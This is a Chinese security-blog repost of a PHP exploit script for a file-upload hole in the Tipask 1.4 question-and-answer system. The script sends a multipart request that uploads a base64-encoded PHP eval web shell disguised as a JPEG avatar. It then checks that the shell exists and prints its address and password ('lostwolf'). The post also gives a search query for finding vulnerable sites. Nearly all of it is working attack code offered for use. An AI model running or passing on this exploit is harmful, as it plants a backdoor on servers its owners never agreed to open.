tipask 1.4 问答系统上传漏洞 exp

admin
admin
admin
100797
文章
86
评论
2021年4月3日20:08:04评论53 views字数 3327阅读11分5秒阅读模式

By:lostwolf

搜索:tiltle:"tipask问答网"

第一次根据别人的exp写的 大牛勿喷.

Exp:

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));

$host = rtrim(ltrim($argv[1],'http://'),'/');
$path = ereg_replace("(/){2,}", "/", $argv[2]);

//print $host;

print "n+------------------------------------------------------------------+";
print "n|                                                                  |";
print "n|      __ __| _    _   |                   |                     |";
print "n|         |  |   | |   | |  __|   __    _ __|                   |";
print "n|         |  |   | |   | |__    |   |  __/ |                     |";
print "n|        _| ___/ ___/ _|____/_)_|  _|___|__|                   |";
print "n|                                                                  |";
print "n|      tipask1.4 File Upload Vulnerability                         |";
print "n|                                                                  |";
print "n|                                                                  |";
print "n+------------------------------------------------------------------+n";

if ($argc
{

        print "nUsage......: php $argv[0] host pathn";
        print "nExample....: php $argv[0] localhost /n";
        die();
}
 
exploit($host,$path);
$url=$host;
$ors=okor($host,$path);
if ($ors){
echo "[*]  Shell:-> ".$url.$path."data/tmp/bigavatar0.phpn";

      
      }else{

          print "[-]  No Bug!n";
          }

function exploit($host,$path){
$shellcode='PD9waHAgZXZhbCgkX1BPU1RbbG9zdHdvbGZdKT8+';
$file=base64_decode($shellcode);
//print $file;
$postdata ="rn";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxcrn";
$postdata .="Content-Disposition: form-data; name="PHPSESSID"rn";
$postdata .="rn";
$postdata .="1rn";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxcrn";
$postdata .="Content-Disposition: form-data; name="Filedata"; filename="1.php"rn";
$postdata .="Content-Type: image/jpegrn";
$postdata .="rn";
$postdata .=$file."rn";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc--rn";
$payload = "POST {$path}/?user/editimg.html HTTP/1.1rn";
$payload .="Host: $hostrn";
$payload .="User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1rn";
$payload .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$payload .="Accept-Language: zh-cn,zh;q=0.5rn";
$payload .="Accept-Encoding: gzip, deflatern";
$payload .="Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$payload .="Keep-Alive: 115rn";
$payload .="Proxy-Connection: keep-alivern";
$payload .="Referer: $host/css/common/swfupload.swf?preventswfcaching=1321556724903rn";
$payload .="Content-type: multipart/form-data; boundary=xndrotxfbsejfrpdhhivrwqkpxrnsdxcrn";
$payload .="Content-Length: 290 rn";

$payload.=$postdata;

print $payload;
$ock=fsockopen($host,80);
if (!$ock) {
echo "[*]  No response from $hostn";
}
fwrite($ock,$payload);
while (!feof($ock)) {
        //print $payload;
        $exp=fgets($ock, 1024);

        return $exp;
        print $postdata;

         }
 }

function okor($host,$path){
$tmp = array();
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"GET {$path}/data/tmp/bigavatar0.php HTTP/1.1rnHost:$hostrnConnection: Closernrn");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if (strpos($data, '200') !== false) {
return         true;
}else{
return false;
}
}
 

?>

shell :  pass:lostwolf

文章来源于lcx.cc:tipask 1.4 问答系统上传漏洞 exp

相关推荐: Flash CSRF 的成因、用途、发现、利用与防御,知识科普

目录 0x00 Flash CSRF名词解释 0x01 Flash CSRF形成的原因 0x02 Flash CSRF可以干些什么 0x03 Flash CSRF如何利用 0x04 Flash CSRF怎么防御 0x00 Flash CSRF名词解释 CSRF…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:08:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   tipask 1.4 问答系统上传漏洞 exphttps://cn-sec.com/archives/325673.html

发表评论

匿名网友 填写信息